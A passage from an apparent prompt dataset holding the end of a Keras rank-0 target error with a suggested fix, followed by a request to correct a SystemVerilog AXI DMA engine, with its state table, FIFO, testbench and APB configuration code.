0.96230975, 0.96230975, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, -1.03916644, -1.03916644,
-1.03916644, -1.03916644, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, 0.96230975, 0.96230975,
0.96230975, 0.96230975, -1.03916644, -1.03916644, -1.03916644,
-1.03916644, 0.96230975, 0.96230975, 0.96230975, -1.03916644,
0.96230975, 0.96230975, 0.96230975, -1.03916644, 0.96230975,
0.96230975, -1.03916644, -1.03916644, -1.03916644, 0.96230975,
0.96230975, 0.96230975, -1.03916644, -1.03916644, 0.96230975,
-1.03916644, -1.03916644]), 'high_output_3d': array([ 4.71621415, 1.19804116, 0.31770009, -0.22501563, -0.30162026,
-0.31233449, -0.15778335, 0.43421314, 1.16057897, 2.07421064,
1.29344201, 0.53835938, 0.57050691, -0.58676546, -0.52571156,
0.12002325, -0.25786155, -0.110555 , -0.10902045, -0.29153914,
-0.17690129, -0.28912251, 0.31835806, -0.4559358 , 1.08871261,
0.24579327, 0.09608714, 1.09025297, 2.37135817, 0.4561815 ,
0.60041093, -0.61320485, -0.4514938 , 0.75382567, 1.31791747,
0.82779958, 0.11432236, 0.4732649 , 0.56352854, 0.45719911,
0.68618582, 0.08102478, -0.60819462, -0.5348488 , -0.30054726,
-0.47880921, -0.48593665, 1.91444741, 1.95720714, 1.28850081,
-0.17376041, -0.28899098, -0.38571521, -0.29623437, 0.19290348,
0.53777091, -0.50303271, -0.19159167, 0.47239652, -0.1276774 ,
-0.46922441, 0.0985919 , 0.29047466, -0.1362923 , -0.06204193,
-0.55521201, -0.62714089, 0.14807491, 0.07160851, 0.46365286,
0.41919798, 0.54975556]), 'low_output_3d': array([ 7.93821628e-01, 7.18894557e-01, -2.81372512e-03, 2.45730132e-01,
1.87258780e-01, -1.70343833e-01, 8.69262170e-02, 5.70708808e-01,
-4.05961609e-01, 8.03443200e-01, 7.37376790e-01, 3.73622262e-01,
-9.10629954e-01, -2.10201374e+00, -1.74373748e+00, -9.78029617e-01,
-1.52272124e+00, 3.23609722e-02, -1.00934287e+00, -1.72951192e+00,
-8.79036989e-01, -4.76495181e+00, -4.19118861e+00, -5.20082219e+00,
-1.59190887e+00, -5.02233072e+00, -4.11093064e+00, -3.12963715e+00,
7.28575370e-01, -7.09322501e-01, -1.97269000e-01, -2.45740698e+00,
-2.20784836e+00, -5.49726690e-01, 2.26756294e-01, 4.00441400e-01,
1.03543158e-01, 6.82514466e-01, 4.81872944e-03, -3.65786369e-01,
7.86141671e-01, -1.73341638e+00, -2.24334653e+00, -1.00598601e+00,
-7.18323866e-01, -1.50515958e+00, -9.51473387e-01, 8.86262682e-03,
4.70123801e-01, 6.02921021e-01, -3.17845272e-01, -1.29657630e+00,
-9.96059673e-01, -1.14215218e+00, -1.22237889e+00, -2.75313245e+00,
-3.64993293e+00, -1.69470749e+00, 3.06855844e-01, -9.16321685e-01,
-1.32960783e+00, 2.43412283e-01, 6.57000836e-01, 6.79646580e-02,
1.87613539e-01, -3.59794214e-01, -3.34196260e-01, 4.02328539e-01,
6.18599808e-01, 2.75596678e-01, 7.42686937e-02, 8.03640765e-01]), 'priority_output_3d': array([-1.02860908, -1.02860908, -1.02860908, 0.97218664, 0.97218664,
-1.02860908, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, -1.02860908, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
0.97218664, 0.97218664, 0.97218664, -1.02860908, -1.02860908,
-1.02860908, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, -1.02860908, -1.02860908, -1.02860908,
0.97218664, 0.97218664, 0.97218664, -1.02860908, 0.97218664,
0.97218664, 0.97218664, 0.97218664, -1.02860908, 0.97218664,
0.97218664, -1.02860908, -1.02860908, -1.02860908, 0.97218664,
0.97218664, 0.97218664, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, 0.97218664]), 'high_output_5d': array([ 3.43085352, 0.74774032, 0.07635356, -0.30611401, -0.24030393,
-0.12262669, 1.08529305, 1.28186013, 0.96109604, 1.68590853,
0.82049719, 0.24463803, 0.26915515, -0.61343158, -0.5668692 ,
-0.07440348, -0.36259502, -0.25025257, -0.24908226, -0.38827902,
-0.30085117, -0.386436 , 0.07685536, -0.51365514, 0.66436156,
0.02151426, -0.0926582 , 0.66553631, 1.64256339, 0.18196556,
0.29196126, -0.63359542, -0.50970055, 0.74347945, 1.23870945,
0.62348067, 0.55365573, 0.85500748, 0.37646281, 0.18274164,
0.35737696, -0.10414542, -0.6297744 , -0.57383766, -0.39514902,
0.37495315, 0.71109134, 1.41311926, 1.4463189 , 0.81672882,
-0.29845579, -0.38633569, -0.46010183, -0.39185981, -0.01882181,
0.24418924, -0.54957331, -0.3120547 , 0.19433186, -0.26331086,
-0.52378961, 0.082117 , 0.05559025, -0.26988097, -0.21325437,
-0.40819043, -0.39626074, 0.45610495, 0.46116255, 0.25422073,
0.15376031, 0.25332925]), 'low_output_5d': array([ 0.86909012, 0.80749677, 0.21422077, 0.252387 , 0.37046874,
0.07650364, 0.28799096, 0.68568156, -0.11718455, 0.87699948,
0.27715391, -0.56802764, -0.64970248, -2.01012908, -1.63428184,
-0.58744965, -1.79860871, -1.02546824, -0.9926242 , -4.22306789,
-3.80560759, -3.93534411, -3.48586234, -5.42562259, -3.33341254,
-3.91204331, -3.1628323 , -2.35616582, 0.81545482, -0.67887223,
-0.63908216, -1.90576727, -1.59841483, -0.23536578, 0.40293744,
0.54571425, 0.30165081, 0.77759073, 0.22049498, -0.79445333,
-0.54246703, -1.22916553, -2.09930931, -1.5179469 , -0.80166265,
-1.0207737 , -0.56561926, 0.22381925, 0.60299625, 0.71216141,
-0.78197709, -1.44190642, -1.73645564, -2.81041725, -2.36248074,
-2.04666238, -2.78387187, -1.17659044, 0.171719 , -0.53672301,
-0.87646243, 0.41662939, 0.7566174 , 0.0657029 , 0.16446958,
-0.07923292, -0.05819027, 0.54726556, 0.72505007, 0.44308639,
0.27758591, 0.68488414]), 'priority_output_5d': array([-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, -1.02532046, -1.02532046, -1.02532046, 0.97530483,
0.97530483, 0.97530483, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, -1.02532046, -1.02532046, 0.97530483, 0.97530483,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, 0.97530483])} of rank 0.",
"stack": "---------------------------------------------------------------------------
ValueError Traceback (most recent call last)
Cell In[53], line 3
1 model = build_model()
----> 3 history = model.fit(data_generator(), steps_per_epoch=100, epochs=10)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\optree\\ops.py:594, in tree_map(func, tree, is_leaf, none_is_leaf, namespace, *rests)
592 leaves, treespec = _C.flatten(tree, is_leaf, none_is_leaf, namespace)
593 flat_args = [leaves] + [treespec.flatten_up_to(r) for r in rests]
--> 594 return treespec.unflatten(map(func, *flat_args))
ValueError: When passing a dataset to a Keras model, the arrays must be at least rank 1. Received: {...the same dict of twelve target arrays shown in the message above...} of rank 0."
}
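A plausible reading of the traceback (a sketch, not a confirmed fix): np.array() applied to the label dict inside data_generator collapses it to a rank-0 object array, which matches the "rank 0" Keras reports.
# numpy wraps a dict into a 0-d object array:
import numpy as np
wrapped = np.array({'high_output_1d': np.zeros(72)})
print(wrapped.ndim)  # 0 -- the rank-0 value Keras rejects
# Sketch of a fix inside data_generator: yield the dict unchanged so each
# named output gets its rank-1 target array:
#     yield np.array(X_batch), y_batch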
|
71d1a4b2812e7d696fba06b36c921555
|
{
"intermediate": 0.3511621356010437,
"beginner": 0.5076932907104492,
"expert": 0.14114464819431305
}
|
46,768
|
Please correct the code between the "Please modify the code correctly" markers below.
<<<StartOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
module DMAC_ENGINE
(
input wire clk,
input wire rst_n, // _n means active low
// configuration registers
input wire [31:0] src_addr_i,
input wire [31:0] dst_addr_i,
input wire [15:0] byte_len_i,
input wire start_i,
output wire done_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (W channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
// mnemonics for state values
localparam S_IDLE = 3'd0,
S_RREQ = 3'd1,
S_RDATA = 3'd2,
S_WREQ = 3'd3,
S_WDATA = 3'd4;
reg [2:0] state, state_n;
reg [31:0] src_addr, src_addr_n;
reg [31:0] dst_addr, dst_addr_n;
reg [15:0] cnt, cnt_n;
reg [3:0] wcnt, wcnt_n;
reg arvalid,
rready,
awvalid,
wvalid,
wlast,
done;
wire fifo_full,
fifo_empty;
reg fifo_wren,
fifo_rden;
wire [31:0] fifo_rdata;
// it's desirable to code registers in a simple way
always_ff @(posedge clk)
if (!rst_n) begin
state <= S_IDLE;
src_addr <= 32'd0;
dst_addr <= 32'd0;
cnt <= 16'd0;
wcnt <= 4'd0;
end
else begin
state <= state_n;
src_addr <= src_addr_n;
dst_addr <= dst_addr_n;
cnt <= cnt_n;
wcnt <= wcnt_n;
end
// this block programs output values and next register values
// based on states.
always_comb begin
// START:Please modify the code correctly.
// START:Please modify the code correctly.
// START:Please modify the code correctly.
fifo_wren = 0;
fifo_rden = 0;
arvalid = 0;
awvalid = 0;
wvalid = 0;
rready = 0;
case (state)
S_IDLE: begin
done = 1'b1;
if (start_i && byte_len_i != 0) begin
state_n = S_RREQ;
end
end
S_RREQ: begin
arvalid = 1'b1;
if (arready_i) begin
state_n = S_RDATA;
src_addr_n = src_addr + 'd4;
//src_addr_n = src_addr + arlen_o;
end
end
S_RDATA: begin
rready = !fifo_full;
if (rvalid_i && !fifo_full) begin
fifo_wren = 1;
// src_addr_n = src_addr + arlen_o;
if (rlast_i) begin
state_n = S_WREQ;
end
else begin
state_n = S_RDATA;
end
end
end
S_WREQ: begin
awvalid = 1;
if (awready_i) begin
state_n = S_WDATA;
dst_addr_n = dst_addr + 'd4;
cnt_n = cnt - arlen_o;
end
if (!fifo_empty) begin
dst_addr_n = dst_addr + arlen_o;
end
end
S_WDATA: begin
wvalid = 1;
if (!fifo_empty && wready_i) begin
fifo_rden = 1;
// dst_addr_n = dst_addr + arlen_o;
if (wlast_o) begin
state_n = S_IDLE;
end
else begin
state_n = S_WDATA;
end
end
end
endcase
// END:Please modify the code correctly.
// END:Please modify the code correctly.
// END:Please modify the code correctly.
// **********************
end
DMAC_FIFO u_fifo
(
.clk (clk),
.rst_n (rst_n),
.full_o (fifo_full),
.wren_i (fifo_wren),
.wdata_i (rdata_i),
.empty_o (fifo_empty),
.rden_i (fifo_rden),
.rdata_o (fifo_rdata)
);
// Output assignments
assign done_o = done;
assign awid_o = 4'd0;
assign awaddr_o = dst_addr;
assign awlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign awsize_o = 3'b010; // 4 bytes per transfer
assign awburst_o = 2'b01; // incremental
assign awvalid_o = awvalid;
assign wid_o = 4'd0;
assign wdata_o = fifo_rdata;
assign wstrb_o = 4'b1111; // all bytes within 4 byte are valid
assign wlast_o = wlast;
assign wvalid_o = wvalid;
assign bready_o = 1'b1;
assign arvalid_o = arvalid;
assign araddr_o = src_addr;
assign arid_o = 4'd0;
assign arlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign arsize_o = 3'b010; // 4 bytes per transfer
assign arburst_o = 2'b01; // incremental
assign rready_o = rready & !fifo_full;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
{ "signal": [
{ "name": "clk", "wave": "p....|....|.......|....." },
{ "name": "state", "wave": "2.3.4|....|..5.6..|..3.4", "data": ["IDLE", "RREQ", "RDATA", "WREQ", "WDATA", "RREQ"] },
{ "name": "write to CMD", "wave": "010..|....|.......|.....", "data": ["1"] },
{},
[ "AR ch",
{ "name": "ARVALID(out)", "wave": "0.1.0|....|.......|.....", "data": ["SRC"] },
{ "name": "ARADDR(out)", "wave": "x.3.x|....|.......|.....", "data": ["SRC"] },
{ "name": "ARLEN(out)", "wave": "2....|....|.......|.....", "data": ["15"] },
{ "name": "ARREADY(in)", "wave": "0..10|....|.......|....." },
],
[ "R ch",
{ "name": "RREADY(out)", "wave": "0...1|....|..0....|....." },
{ "name": "RVALID(in)", "wave": "0....|.1..|..0....|....." },
{ "name": "RLAST(in)", "wave": "0....|....|.10....|....." },
{ "name": "RDATA(in)", "wave": "x....|.444|44x....|.....", "data": ["D0", "D1", "D2", "D14", "D15"] },
],
[ "AW ch",
{ "name": "AWVALID(out)", "wave": "0....|....|..1.0..|....." },
{ "name": "AWADDR(out)", "wave": "x....|....|..5.x..|.....", "data": ["DST"] },
{ "name": "AWLEN(out)", "wave": "2....|....|.......|.....", "data": ["15"] },
{ "name": "AWREADY(in)", "wave": "0....|....|...10..|....." },
],
[ "W ch",
{ "name": "WVALID(out)", "wave": "0....|....|....1..|..0.." },
{ "name": "WDATA(out)", "wave": "x....|....|....444|44x..", "data": ["D0", "D1", "D2", "D14", "D15"] },
{ "name": "WLAST(out)", "wave": "0....|....|.......|.10.." },
{ "name": "WREADY(in)", "wave": "0....|....|....1..|..0.." }
]
],
"head" : {
"tick" : "0"
},
"foot" : {
"tick" : "0"
}
}
Figure 3. DMA operation with burst transfers. Each request reads/writes 16 beats of data at a time.
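A quick arithmetic check of the burst parameters (a Python sketch; the helper name is hypothetical, and the expression mirrors the RTL's "(cnt >= 'd64) ? 4'hF : cnt[5:2]-4'h1"):
# AxLEN encodes (beats - 1); with 4-byte beats, 16 beats move 64 bytes.
def axi_len(cnt_bytes):
    return 0xF if cnt_bytes >= 64 else (cnt_bytes // 4) - 1

assert axi_len(256) == 15  # full 16-beat burst, as in Figure 3
assert axi_len(32) == 7    # 8 beats for a final partial burst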
Please verify if the following table is correct using the code provided below.
+-------+-------------------------------------------------------------------------------------+------------+-----------------------------------------------------------+-----------------------------------------+
| State | Major outputs | Next State | Next state transition condition | Notes |
| +---------+--------+---------------------------------------+-------------------+------+ | | |
| | ARVALID | RREADY | AWVALID | WVALID | done | | | |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| IDLE | 0 | 0 | 0 | 0 | 1 | RREQ | (DMA_CMD.start is written as 1) and (DMA_LEN.byte_len!=0) | On moving out, |
| | | | | | | | | - Copy DMA_SRC to SRC_ADDR. |
| | | | | | | | | - Copy DMA_DST to DST_ADDR |
| | | | | | | | | - Copy DMA_LEN to the internal counter |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| RREQ | 1 | 0 | 0 | 0 | 0 | RDATA | ARREADY=1 | On moving out, |
| | | | | | | | | - Increment ARADDR by 4 |
| | | | | | | | | |
| | | | | | | | | ARLEN = (cnt>=64) ? 'hF : cnt[5:2]-4'h1 |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| RDATA | 0 | 1 | 0 | 0 | 0 | WREQ | (RVALID=1) & (RLAST) | Push data to FIFO |
| | | | | | +------------+-----------------------------------------------------------+-----------------------------------------+
| | | | | | | RDATA | (RVALID) & (!RLAST) | Push data to FIFO |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| WREQ | 0 | 0 | 1 | 0 | 0 | WDATA | AWREADY=1 | On moving out, |
| | | | AWLEN=(cnt>=64) ? 'hF : cnt[5:2]-4'h1 | | | | | - Increment AWADDR by 4 |
| | | | | | | | | - Decrement the internal counter by 4 |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| WDATA | 0 | 0 | 0 | 1 | 0 | RREQ | (WREADY=1) (!WLAST) & (counter!=0) | Pop data from FIFO |
| | | | | WLAST=(wcnt=='d0) | | | | Decrement wcnt |
| | | | | | +------------+-----------------------------------------------------------+-----------------------------------------+
| | | | | | | IDLE | (WREADY=1) (WLAST) & (counter==0) | Pop data from FIFO |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
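To help verify the table, here is a small Python reference model of the transitions (a sketch only; state and signal names follow the RTL, FIFO back-pressure is ignored, and the WDATA row is encoded per Figure 3, i.e. back to RREQ when WLAST fires with bytes remaining -- the table's "(!WLAST)" condition on that row is worth double-checking):
def next_state(state, sig):
    # sig: dict of the handshake signals sampled this cycle
    if state == 'IDLE':
        return 'RREQ' if sig.get('start') and sig.get('byte_len') else 'IDLE'
    if state == 'RREQ':
        return 'RDATA' if sig.get('arready') else 'RREQ'
    if state == 'RDATA':
        if sig.get('rvalid'):
            return 'WREQ' if sig.get('rlast') else 'RDATA'
        return 'RDATA'
    if state == 'WREQ':
        return 'WDATA' if sig.get('awready') else 'WREQ'
    if state == 'WDATA':
        if sig.get('wready') and sig.get('wlast'):
            return 'RREQ' if sig.get('cnt') else 'IDLE'
        return 'WDATA'
    return state

# One burst done, 64 bytes still pending: expect another read request.
assert next_state('WDATA', {'wready': 1, 'wlast': 1, 'cnt': 64}) == 'RREQ'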
<<<StartOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
module DMAC_FIFO #(
parameter DEPTH_LG2 = 4,
parameter DATA_WIDTH = 32
)
(
input wire clk,
input wire rst_n,
output wire full_o,
input wire wren_i,
input wire [DATA_WIDTH-1:0] wdata_i,
output wire empty_o,
input wire rden_i,
output wire [DATA_WIDTH-1:0] rdata_o
);
localparam FIFO_DEPTH = (1<<DEPTH_LG2);
reg [DATA_WIDTH-1:0] data[FIFO_DEPTH];
reg full, full_n,
empty, empty_n;
reg [DEPTH_LG2:0] wrptr, wrptr_n,
rdptr, rdptr_n;
// reset entries to all 0s
always_ff @(posedge clk)
if (!rst_n) begin
full <= 1'b0;
empty <= 1'b1; // empty right after reset
wrptr <= {(DEPTH_LG2+1){1'b0}};
rdptr <= {(DEPTH_LG2+1){1'b0}};
for (int i=0; i<FIFO_DEPTH; i++) begin
data[i] <= {DATA_WIDTH{1'b0}};
end
end
else begin
full <= full_n;
empty <= empty_n;
wrptr <= wrptr_n;
rdptr <= rdptr_n;
if (wren_i) begin
data[wrptr[DEPTH_LG2-1:0]] <= wdata_i;
end
end
always_comb begin
wrptr_n = wrptr;
rdptr_n = rdptr;
if (wren_i) begin
wrptr_n = wrptr + 'd1;
end
if (rden_i) begin
rdptr_n = rdptr + 'd1;
end
empty_n = (wrptr_n == rdptr_n);
full_n = (wrptr_n[DEPTH_LG2]!=rdptr_n[DEPTH_LG2])
&(wrptr_n[DEPTH_LG2-1:0]==rdptr_n[DEPTH_LG2-1:0]);
end
// synthesis translate_off
always @(posedge clk) begin
if (full_o & wren_i) begin
$display("FIFO overflow");
@(posedge clk);
$finish;
end
end
always @(posedge clk) begin
if (empty_o & rden_i) begin
$display("FIFO underflow");
@(posedge clk);
$finish;
end
end
// synthesis translate_on
assign full_o = full;
assign empty_o = empty;
assign rdata_o = data[rdptr[DEPTH_LG2-1:0]];
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
<<<StartOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
`define IP_VER 32'h000
`define SRC_ADDR 32'h100
`define DST_ADDR 32'h104
`define LEN_ADDR 32'h108
`define STAT_ADDR 32'h110
`define START_ADDR 32'h10c
`define TIMEOUT_CYCLE 999999
module DMAC_TOP_TB ();
reg clk;
reg rst_n;
// clock generation
initial begin
clk = 1'b0;
forever #10 clk = !clk;
end
// reset generation
initial begin
rst_n = 1'b0; // active at time 0
repeat (3) @(posedge clk); // after 3 cycles,
rst_n = 1'b1; // release the reset
end
// enable waveform dump
initial begin
$dumpfile("dump.vcd");
$dumpvars(0, u_DUT);
end
// timeout
initial begin
#`TIMEOUT_CYCLE $display("Timeout!");
$finish;
end
APB apb_if (.clk(clk));
AXI_AW_CH aw_ch (.clk(clk));
AXI_W_CH w_ch (.clk(clk));
AXI_B_CH b_ch (.clk(clk));
AXI_AR_CH ar_ch (.clk(clk));
AXI_R_CH r_ch (.clk(clk));
task test_init();
int data;
apb_if.init();
@(posedge rst_n); // wait for a release of the reset
repeat (10) @(posedge clk); // wait another 10 cycles
apb_if.read(`IP_VER, data);
$display("---------------------------------------------------");
$display("IP version: %x", data);
$display("---------------------------------------------------");
$display("---------------------------------------------------");
$display("Reset value test");
$display("---------------------------------------------------");
apb_if.read(`SRC_ADDR, data);
if (data===0)
$display("DMA_SRC(pass): %x", data);
else begin
$display("DMA_SRC(fail): %x", data);
@(posedge clk);
$finish;
end
apb_if.read(`DST_ADDR, data);
if (data===0)
$display("DMA_DST(pass): %x", data);
else begin
$display("DMA_DST(fail): %x", data);
@(posedge clk);
$finish;
end
apb_if.read(`LEN_ADDR, data);
if (data===0)
$display("DMA_LEN(pass): %x", data);
else begin
$display("DMA_LEN(fail): %x", data);
@(posedge clk);
$finish;
end
apb_if.read(`STAT_ADDR, data);
if (data===1)
$display("DMA_STATUS(pass): %x", data);
else begin
$display("DMA_STATUS(fail): %x", data);
@(posedge clk);
$finish;
end
endtask
task test_dma(input int src, input int dst, input int len);
int data;
int word;
realtime elapsed_time;
$display("---------------------------------------------------");
$display("Load data to memory");
$display("---------------------------------------------------");
for (int i=src; i<(src+len); i=i+4) begin
word = $random;
u_mem.write_word(i, word);
end
$display("---------------------------------------------------");
$display("Configuration test");
$display("---------------------------------------------------");
apb_if.write(`SRC_ADDR, src);
apb_if.read(`SRC_ADDR, data);
if (data===src)
$display("DMA_SRC(pass): %x", data);
else begin
$display("DMA_SRC(fail): %x", data);
@(posedge clk);
$finish;
end
apb_if.write(`DST_ADDR, dst);
apb_if.read(`DST_ADDR, data);
if (data===dst)
$display("DMA_DST(pass): %x", data);
else begin
$display("DMA_DST(fail): %x", data);
@(posedge clk);
$finish;
end
apb_if.write(`LEN_ADDR, len);
apb_if.read(`LEN_ADDR, data);
if (data===len)
$display("DMA_LEN(pass): %x", data);
else begin
$display("DMA_LEN(fail): %x", data);
@(posedge clk);
$finish;
end
$display("---------------------------------------------------");
$display("DMA start");
$display("---------------------------------------------------");
apb_if.write(`START_ADDR, 32'h1);
elapsed_time = $realtime;
$display("---------------------------------------------------");
$display("Wait for a DMA completion");
$display("---------------------------------------------------");
data = 0;
while (data!=1) begin
apb_if.read(`STAT_ADDR, data);
repeat (100) @(posedge clk);
end
@(posedge clk);
elapsed_time = $realtime - elapsed_time;
$timeformat(-9, 0, " ns", 10);
$display("Elapsed time for DMA: %t", elapsed_time);
$display("---------------------------------------------------");
$display("DMA completed");
$display("---------------------------------------------------");
repeat (len) @(posedge clk); // to make sure data is written
$display("---------------------------------------------------");
$display("verify data");
$display("---------------------------------------------------");
for (int i=0; i<len; i=i+4) begin
logic [31:0] src_word;
logic [31:0] dst_word;
src_word = u_mem.read_word(src+i);
dst_word = u_mem.read_word(dst+i);
if (src_word!==dst_word) begin
$display("Mismatch! (src:%x @%x, dst:%x @%x)", src_word, src+i, dst_word, dst+i);
end
end
endtask
int src,
dst,
len;
// main
initial begin
test_init();
src = 'h0000_1000;
dst = 'h0000_2000;
len = 'h0100;
$display("===================================================");
$display("= 1st trial");
$display("= Copying %x bytes from %x to %x", len, src, dst);
$display("===================================================");
test_dma(src, dst, len);
src = 'h1234_1234;
dst = 'hABCD_ABCC;
len = 'h0F00;
$display("===================================================");
$display("= 2nd trial (long transfer)");
$display("= Copying %x bytes from %x to %x", len, src, dst);
$display("===================================================");
test_dma(src, dst, len);
src = 'h4278_0000;
dst = 'h4278_1000;
len = 'h0F10;
$display("===================================================");
$display("= 3rd trial (long transfer-2)");
$display("= Copying %x bytes from %x to %x", len, src, dst);
$display("===================================================");
test_dma(src, dst, len);
$finish;
end
AXI_SLAVE u_mem (
.clk (clk),
.rst_n (rst_n),
.aw_ch (aw_ch),
.w_ch (w_ch),
.b_ch (b_ch),
.ar_ch (ar_ch),
.r_ch (r_ch)
);
DMAC_TOP u_DUT (
.clk (clk),
.rst_n (rst_n),
// APB interface
.psel_i (apb_if.psel),
.penable_i (apb_if.penable),
.paddr_i (apb_if.paddr[11:0]),
.pwrite_i (apb_if.pwrite),
.pwdata_i (apb_if.pwdata),
.pready_o (apb_if.pready),
.prdata_o (apb_if.prdata),
.pslverr_o (apb_if.pslverr),
// AXI AW channel
.awid_o (aw_ch.awid),
.awaddr_o (aw_ch.awaddr),
.awlen_o (aw_ch.awlen),
.awsize_o (aw_ch.awsize),
.awburst_o (aw_ch.awburst),
.awvalid_o (aw_ch.awvalid),
.awready_i (aw_ch.awready),
// AXI W channel
.wid_o (w_ch.wid),
.wdata_o (w_ch.wdata),
.wstrb_o (w_ch.wstrb),
.wlast_o (w_ch.wlast),
.wvalid_o (w_ch.wvalid),
.wready_i (w_ch.wready),
// AXI B channel
.bid_i (b_ch.bid),
.bresp_i (b_ch.bresp),
.bvalid_i (b_ch.bvalid),
.bready_o (b_ch.bready),
// AXI AR channel
.arid_o (ar_ch.arid),
.araddr_o (ar_ch.araddr),
.arlen_o (ar_ch.arlen),
.arsize_o (ar_ch.arsize),
.arburst_o (ar_ch.arburst),
.arvalid_o (ar_ch.arvalid),
.arready_i (ar_ch.arready),
// AXI R channel
.rid_i (r_ch.rid),
.rdata_i (r_ch.rdata),
.rresp_i (r_ch.rresp),
.rlast_i (r_ch.rlast),
.rvalid_i (r_ch.rvalid),
.rready_o (r_ch.rready)
);
endmodule
<<<EndOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_CFG.sv>>>
module DMAC_CFG
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// configuration registers
output reg [31:0] src_addr_o,
output reg [31:0] dst_addr_o,
output reg [15:0] byte_len_o,
output wire start_o,
input wire done_i
);
// Configuration register to read/write
reg [31:0] src_addr;
reg [31:0] dst_addr;
reg [15:0] byte_len;
//----------------------------------------------------------
// Write
//----------------------------------------------------------
// an APB write occurs when PSEL & PENABLE & PWRITE
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// wren : _______----_____________________________
//
// DMA start command must be asserted when APB writes 1 to the DMA_CMD
// register
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// paddr : |DMA_CMD|
// pwdata : | 1 |
// start : _______----_____________________________
wire wren = psel_i & penable_i & pwrite_i;
always @(posedge clk) begin
if (!rst_n) begin
src_addr <= 32'd0;
dst_addr <= 32'd0;
byte_len <= 16'd0;
end
else if (wren) begin
case (paddr_i)
'h100: src_addr <= pwdata_i[31:0];
'h104: dst_addr <= pwdata_i[31:0];
'h108: byte_len <= pwdata_i[15:0];
endcase
end
end
wire start = wren & (paddr_i=='h10C) & pwdata_i[0];
//----------------------------------------------------------
// READ
//----------------------------------------------------------
// an APB read occurs when PSEL & PENABLE & !PWRITE
// To make read data a direct output from register,
// this code shall buffer the muxed read data into a register
// in the SETUP cycle (PSEL & !PENABLE)
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ________________________________________
// reg update : ___----_________________________________
// prdata : |DATA
reg [31:0] rdata;
always @(posedge clk) begin
if (!rst_n) begin
rdata <= 32'd0;
end
